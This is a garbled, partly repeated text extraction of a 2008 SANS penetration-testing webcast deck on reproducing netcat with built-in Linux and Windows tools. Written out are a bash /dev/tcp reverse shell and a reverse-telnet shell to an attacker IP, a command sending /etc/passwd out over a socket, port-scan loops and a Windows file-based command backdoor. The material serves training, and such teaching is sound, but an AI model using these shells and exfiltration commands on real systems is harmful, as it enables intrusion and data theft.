httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 8
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8
Testing Network
Infrastructure - ISPbull For internal testing a fast connection near a backbone with
minimal filtering is idealbull For Internet-based testing you will need to send packets
through your ISP to the target
ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation
bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems
bull Can seriously impair your ability to test and the accuracy of your results
bull Tell your ISP that you plan to do pen tests and ask if theyblock
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 9
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9
Outline
bull Building a Penetration TestInfrastructure
